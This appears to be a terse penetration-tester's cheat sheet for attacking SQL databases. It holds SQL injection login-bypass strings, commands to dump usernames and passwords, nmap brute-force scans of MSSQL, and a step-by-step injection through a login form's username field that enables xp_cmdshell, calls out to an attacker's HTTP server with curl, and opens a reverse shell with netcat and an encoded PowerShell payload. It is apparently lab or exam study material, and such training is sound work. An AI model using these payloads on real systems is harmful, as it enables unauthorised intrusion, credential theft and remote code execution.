SQL
Login Bypasses
' OR 1=1' --
' or 1=1 --
' OR '' = '
admin' -- //
admin' or '
MySQL
PostgreSQL
MSSQL
Enumerate
' OR 1=1' --
' or 1=1 --
' OR '' = '
admin' -- //
admin' or '
# Service
systemctl status mysql # Check if running + errors
systemctl restart mysql # Restart after changes/crash
# Connect
mysql -u nurhodelta -p # Other user login
mysql -u root -p PHPgal # Login + select DB
# Basic
SHOW DATABASES; # List all databases
USE employee_akpoly; # Switch to a DB
SHOW TABLES; # List tables in current DB
DESCRIBE tblemployee; # Show columns + types (or SHOW COLUMNS FROM tblemployee;)
SELECT * FROM users; # Dump users table
SELECT * FROM tblemployee; # Common employee table
SELECT username, password FROM users; # Targeted creds dump
# Very useful extras (add when needed)
SELECT * FROM table_name LIMIT 5; # Safe preview
SELECT user, host FROM mysql.user; # MySQL accounts
# Backup and restore
Backup: mysqldump db_name > backup.sql
Restore: mysql db_name < backup.sql
# Nmap scan
nmap -T4 -sV -p 5432,5433
# Connect
psql -h IP -U user -d database
nmap -n -v -sV -Pn -p 1433 -script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password
10.10.194.142
# Brute force
nmap -n -sV -Pn -p 1433 -script ms-sql-brute -script-args
userdb=users_ldap.txt,passdb=/usr/share/wordlists/rockyou.txt 10.10.194.142
# Impacket
impacket-mssqlclient Administrator:<password>@<target-ip> -windows-auth
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';
# Identify sleep 10sec
';waitfor delay '0:0:10'--
# Enable xp_cmdshell
UsernameTextBox=admin';EXEC sp_configure 'show advanced options', 1--+
UsernameTextBox=admin';RECONFIGURE--+
UsernameTextBox=admin';EXEC sp_configure 'xp_cmdshell', 1--+
UsernameTextBox=admin';RECONFIGURE--+
# Verify
python -m http.server 80
UsernameTextBox=admin';EXEC xp_cmdshell 'curl http://192.168.45.227'--+&...
# RCE
rlwrap nc -lvnp 4444
UsernameTextBox=admin';EXEC xp_cmdshell 'powershell -e B64PAYLOAD=='&PasswordTextBox=...